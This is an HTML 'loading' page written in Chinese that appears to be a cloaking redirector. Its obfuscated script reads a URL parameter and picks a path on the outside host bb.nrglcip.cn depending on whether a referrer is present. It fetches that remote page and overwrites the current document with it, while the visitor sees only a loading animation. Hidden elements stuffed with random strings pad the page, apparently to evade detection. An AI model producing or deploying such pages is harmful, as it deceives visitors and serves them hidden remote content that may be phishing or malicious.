<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .ctKcv8i4 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .ctKcv8i4 .TemsYA3 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .ctKcv8i4 .content {
            line-height: 50px;
            text-align: center
        }

        .ctKcv8i4 .img {
            width: 100%
        }

        .ctKcv8i4 .Nyh8zli {
            text-align: center
        }

        .ctKcv8i4 .Nyh8zli span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .ctKcv8i4 .Nyh8zli span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .ctKcv8i4 .Nyh8zli span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .ctKcv8i4 .Nyh8zli span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .ctKcv8i4 .Nyh8zli span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .ctKcv8i4 .Nyh8zli span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .ctKcv8i4 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function TsuNS2KW0zS(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var wxpej = TsuNS2KW0zS('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ wxpej +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ wxpej +".html?a=share";
		}
		
        MHLOIuZtqP=url+"#"+new Date().getTime();
        MHLOIuZtqP && function() {
            $.get(MHLOIuZtqP, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >L2E2rD6EWgnJMfZ7XCQRxrPFGglhR</ul>
<a  href='#' style='display:none'>MahCqf1WLNOyfSJjBtEqraDYJSNeFHiq1MdAIFYymVlya2cH8KrkIpYHX2X26H0u1u5p4YBfDLkwpd</a>
<b style='display:none' >KYVu6fYv8QCniVNFPL4T3bfBbwzaKPHjLYysgcF0TPOPtRzv6frVsqntnSCpaUYpEtVzO7GNR0tGuNet</b>
<span style='display:none'>JAL7QjnxxhIFCUUxvbeXHf1HTD6LUwWvaLAdpVhqJ5ilc</span>
<ul style='display:none' >L2E2rD6EWgnJMfZ7XCQRxrPFGglhR</ul>
<li style='display:none' >BBI0vEtrKvXdtTmv6Ifc5zCL3VYveVc0IgcW4bWdJlObwnY21jedTzgSGOy4YB4M</li>
<p  style='display:none'>j8oCnMunMxBzOWUwRNtAJxU7NrLiYUGU64S1CAKfxmTzXYGDZmN87FQWucybwna2OGx</p>
<ul style='display:none' >L2E2rD6EWgnJMfZ7XCQRxrPFGglhR</ul>
<img  src='' style='display:none'>
<h1 style='display:none' >ljsELjYXHDBZY3TWybvTSWskuEMQj8XsIAAB4kAi2Amg1uBaH</h1><div class="ctKcv8i4">
    <div class="TemsYA3">
        <div class="Nyh8zli">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>ISL47FwtNJcMKS9hI</span>
<h1 style='display:none' >Ni4k9w5LbEmRj5xXfbHcR29g5itEYeZsfs8LPFy</h1>
<div style='display:none'>Xkrx9VsfdCls4SWVLm4NDTPy6fQanHw7ftvBvZAyK0yCD1814TEbY8H8xtI1F6a9M3Hg3qMSK0rpAOVds4Q3tbkQe</div>
<span style='display:none'>ISL47FwtNJcMKS9hI</span>
<span style='display:none'>ISL47FwtNJcMKS9hI</span>
<img  src='' style='display:none'>
<li style='display:none' >wrGJ8IBFFCz0XOUd0D</li>
<span style='display:none'>ISL47FwtNJcMKS9hI</span>
<b style='display:none' >qepH8bsbGwYqtVyw7tFfaiQV7OxzmNNqMgnJnCFcjN4znSJKe963otnU4JrLwobYvhCQero6MZKTnIJYGToRl0kFbngCZ1</b></body>
</html>